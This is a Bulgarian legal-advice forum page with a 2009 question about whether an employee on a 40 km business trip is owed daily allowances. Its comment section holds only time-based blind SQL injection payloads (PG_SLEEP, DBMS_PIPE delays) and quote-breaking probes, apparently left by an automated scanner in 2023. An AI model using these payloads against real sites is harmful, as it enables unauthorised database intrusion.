Командировка

22.02.2009г. 09:07:16
Поради възникнала целесъобразност от предприятието в което работя ме командироваха на 40 км в друг град от същата област,като ми заплащат само пътните ,но отказват да ми заплатят дневни.Имам ли право на дневни?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:46
-1)) OR 185=(SELECT 185 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
XMo0yAaG' OR 905=(SELECT 905 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
PMQnF6Ku') OR 619=(SELECT 619 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
A10qWm2t')) OR 15=(SELECT 15 FROM PG_SLEEP(15))--
lxbfYeaa
05.10.2023г. 07:46
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
05.10.2023г. 07:46
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
05.10.2023г. 07:46
1'"
lxbfYeaa
05.10.2023г. 07:46
@@iN5Ls

Коментар